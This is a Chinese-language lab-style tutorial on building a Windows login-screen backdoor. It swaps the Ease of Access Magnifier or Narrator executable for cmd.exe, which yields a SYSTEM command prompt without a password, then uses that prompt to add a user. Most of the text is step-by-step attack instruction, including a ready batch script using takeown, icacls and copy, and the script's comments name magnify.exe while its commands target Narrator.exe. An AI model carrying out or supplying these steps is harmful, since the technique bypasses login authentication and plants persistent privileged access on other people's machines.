利用開機賬戶登入“輕松通路”建立Windows後門
實驗原理:
利用登入賬戶界面的“輕松通路”中的“放大鏡”,把它替換為cmd.exe程式,實作在不登入的情況下打開指令提示符,并進行一些操作(打開的cmd的權限為系統管理者權限)。
實驗步驟:
一、圖形化操作
1.找到Magnify.exe(放大鏡),嘗試重命名,提示沒有權限,是因為該程式的所有者不是目前使用者
2.把目前程式的所有者修改為目前使用者
3.修改完程式的所有者之後,就可以對該程式進行操作了,這裡先備份一下Magnify.exe,友善以後進行恢複,然後複制一份cmd.exe程式,并把複制的cmd程式修改為Magnify.exe,這樣以後通過“輕松通路“,打開放大鏡(實際上就是打開cmd.exe程式了)
4.點選“輕松通路“,打開”放大鏡“點選左下角辨別,我們可以看到如下界面呈現的頁面,因為我們的後門是對放大鏡程式做了更改,将放大鏡直接更改為以管理者運作的cmd指令操作行,是以,我們點選放大鏡,就可以直接進入cmd。
5.可以看到cmd.exe程式運作了,這樣就可以進行一些操作了,這裡以建立使用者為例
二、用腳本運作:
1.腳本内容如下: #不懂指令的文法可以自己輸入指令檢視幫助文檔
打開記事本,輸入如下的指令:
切換目錄到c:\windows\system32;
cd c:\windows\system32
更改檔案名為magnify.exe的所有者為目前使用者;
takeown /f Narrator.exe
将目前使用者所在的組(管理者組)賦予完全通路權限;
icacls Narrator.exe /grant administrators:F
将可執行檔案magnify.exe更名為magnify_back.exe;
ren Narrator.exe Narrator_back.exe
将cmd.exe複制并更名為magnify.exe;
copy cmd.exe Narrator.exe
2.懂指令的文法可以自己輸入指令檢視幫助文檔
3.把檔案儲存為back.bat,并輕按兩下運作,接下開螢幕會閃爍一下,後門已經搞好了
4.重新開機電腦使剛才運作的腳本生效,點選“輕松通路“,點選”講述人“
5.可以看到運作了cmd程式,因為我們的後門是對講述人程式做了更改,将講述人直接更改為以管理者運作的cmd指令操作行,是以,我們點選講述人,就可以直接進入cmd。系統在沒有輸入使用者名和密碼的情況下,彈出了cmd指令行界面,而且是system權限
6.重新開機系統,用剛才建立的使用者名密碼登入(這裡我加入域了,是以本地登入需要在使用者名前面加上本地計算機名)